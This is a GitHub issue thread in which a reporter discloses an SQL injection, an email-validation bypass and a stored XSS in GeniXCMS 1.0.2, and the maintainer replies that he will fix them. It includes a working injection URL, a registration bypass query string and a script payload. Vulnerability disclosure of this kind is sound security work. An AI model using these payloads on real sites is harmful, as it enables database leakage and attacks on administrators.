### ISSUE TITLE
SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2

### ISSUE THREAD

**Issue by Hecbi** [semplon/GeniXCMS#72]
# SQL Injection
I find a SQL injection at /inc/lib/Control/Backend/menus.control.php
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247

```php
$sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
Db::query($sql);
```

Go http://localhost/gxadmin/index.php?page=menus , find a menus and click del button. Change the position of menuid and token, change menuid into : `menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'`

exp:`/CMS/GeniXCMS-master/gxadmin/index.php?page=menus&token=eMEfQ9xolysmPbu6Ru1EP13Okkqt0A7FeDO8vjCWo1rpshooHHNy9DsCEqV1qtk3poFGcqkhiR0xxKyv&act=remove&menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'`

![image](https://cloud.githubusercontent.com/assets/23554653/25368176/37ca5818-29ad-11e7-8f2f-d1adf3648435.png)

Don't forget to get a active csrftoken.

# Mailbox validation logic vulnerabilities
And there is another vulnerability in register.php line 56
https://github.com/semplon/GeniXCMS/blob/master/register.php

```php
    if (!User::isEmail($_POST['email'])) {
        $alertDanger[] = MSG_USER_EMAIL_EXIST;
    }
```

```php
    public static function isEmail($vars)
    {
        if (isset($_GET['act']) && $_GET['act'] == 'edit') {
            $id = Typo::int($_GET['id']);
            $where = "AND `id` != '{$id}' ";
        } else {
            $where = '';
        }
        $vars = sprintf('%s', Typo::cleanX($vars));
        $sql = sprintf("SELECT * FROM `user` WHERE `email` = '%s' %s", $vars, $where);
        $e = Db::result($sql);
        if (Db::$num_rows > 0) {
            return false;
        } else {
            return true;
        }
    }
```

So i can register a new user with email in id1 by using `register.php?act=edit&id=1`

# XSS
Register a user and reply to an post with XSS payload, eg: <script>alert(2)</script>
When the administrator into the background to view this comment, and move the mouse up, XSS will take effect.
![image](https://cloud.githubusercontent.com/assets/23554653/25436691/ad58fdea-2ac6-11e7-8de3-505952a4830a.png)

**Comment by Hecbi** [comment]
Hi, i don't know if you receive this message.

**Comment by semplon** [comment]
thank you for reporting the issue. i will fix this issue soon.
